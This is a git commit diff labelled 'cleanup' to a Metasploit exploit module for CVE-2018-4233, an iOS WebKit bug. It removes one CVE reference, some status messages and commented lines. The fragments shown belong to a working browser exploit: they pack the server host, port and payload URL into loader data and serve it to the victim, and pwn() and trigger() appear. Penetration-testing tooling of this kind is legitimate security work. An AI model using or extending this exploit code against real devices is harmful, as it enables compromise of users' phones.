cleanup
This commit is contained in:
parent
90da47627b
commit
b7574f2dd8
|
@ -28,7 +28,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
],
|
||||
'References' => [
|
||||
['CVE', '2018-4233'],
|
||||
['CVE', '2018-4243'],
|
||||
['URL', 'https://github.com/saelo/cve-2018-4233'],
|
||||
['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],
|
||||
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1564'],
|
||||
|
@ -86,11 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
config = [srvhost, srvport].pack("Nn") + payload_url
|
||||
payload_url_index = loader_data.index('PAYLOAD_URL')
|
||||
loader_data[payload_url_index, config.length] = config
|
||||
if ios_11
|
||||
print_good("Sent empty_list exploit")
|
||||
else
|
||||
print_good("Sent async_wake exploit")
|
||||
end
|
||||
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
|
||||
return
|
||||
end
|
||||
|
@ -384,9 +379,7 @@ function trigger(constr, modify, res, val) {
|
|||
}
|
||||
|
||||
var workbuf = new ArrayBuffer(0x1000000);
|
||||
//var u32_buffer = new Uint32Array(workbuf);
|
||||
var payload = new Uint8Array(workbuf);
|
||||
//var shellcode_length;
|
||||
|
||||
function pwn() {
|
||||
var stage1 = {
|
||||
|
|
Loading…
Reference in New Issue